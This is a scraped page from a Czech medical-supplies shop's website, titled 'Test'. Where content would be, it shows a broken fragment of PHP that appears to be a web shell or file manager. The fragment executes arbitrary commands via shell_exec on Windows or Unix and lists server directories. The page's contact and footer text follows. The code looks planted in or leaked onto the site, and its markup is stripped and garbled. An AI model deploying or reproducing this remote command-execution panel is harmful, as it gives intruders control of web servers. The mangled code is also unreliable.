Právě se nacházíte v:

Test

Command Output:

';
    
    // Change to the specified directory
    $old_cwd = getcwd();
    chdir($current_path);
    
    // Execute command based on OS
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        // Windows
        $output .= htmlspecialchars(shell_exec("cmd /c " . escapeshellcmd($command) . " 2>&1"));
    } else {
        // Unix/Linux
        $output .= htmlspecialchars(shell_exec(escapeshellcmd($command) . " 2>&1"));
    }
    
    // Restore original directory
    chdir($old_cwd);
    
    $output .= '

'; } function show_directory_contents() { global $current_path, $output; $html = '

'; $html .= '

Current Directory: ' . htmlspecialchars($current_path) . '

'; try { // Navigation bar $html .= ' '; // File table $html .= ''; $html .= ''; // First, show directories $items = scandir($current_path); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $full_path = $current_path . DIRECTORY_SEPARATOR . $item; if (is_dir($full_path)) { $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; } } // Then, show files foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $full_path = $current_path . DIRECTORY_SEPARATOR . $item; if (is_file($full_path)) { $ext = strtolower(pathinfo($item, PATHINFO_EXTENSION)); $icon = get_file_icon($ext); $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; } } $html .= '
Name Type Size Modified Actions
 

tiráž

(c)2013–2026 Malkol-delta s.r.o.
Tvorba webu - DOLPHIN

(x)HTML 1.0 Strict!

 

kontakty

Prodejna zdravotních potřeb Petržílkova - Praha
Petržílkova 2706/30
155 00 Praha 13
e-mail: zppraha@malkol.cz

Prodejna zdravotních potřeb Komenského - Olomouc
Komenského 20, 779 00 Olomouc
e-mail: olomouc@malkol.cz

Prodejna zdravotních potřeb Cejl - Brno
Cejl 82/58, 602 00 Brno
e-mail: zpbrno@malkol.cz

 

Centrála BUŠOVICE
Bušovice 4, 338 24 Břasy 1
e-mail: eshop@malkol.cz

Podrobnější kontaktní údaje najdete na stránkách Prodejny
a Kontakty.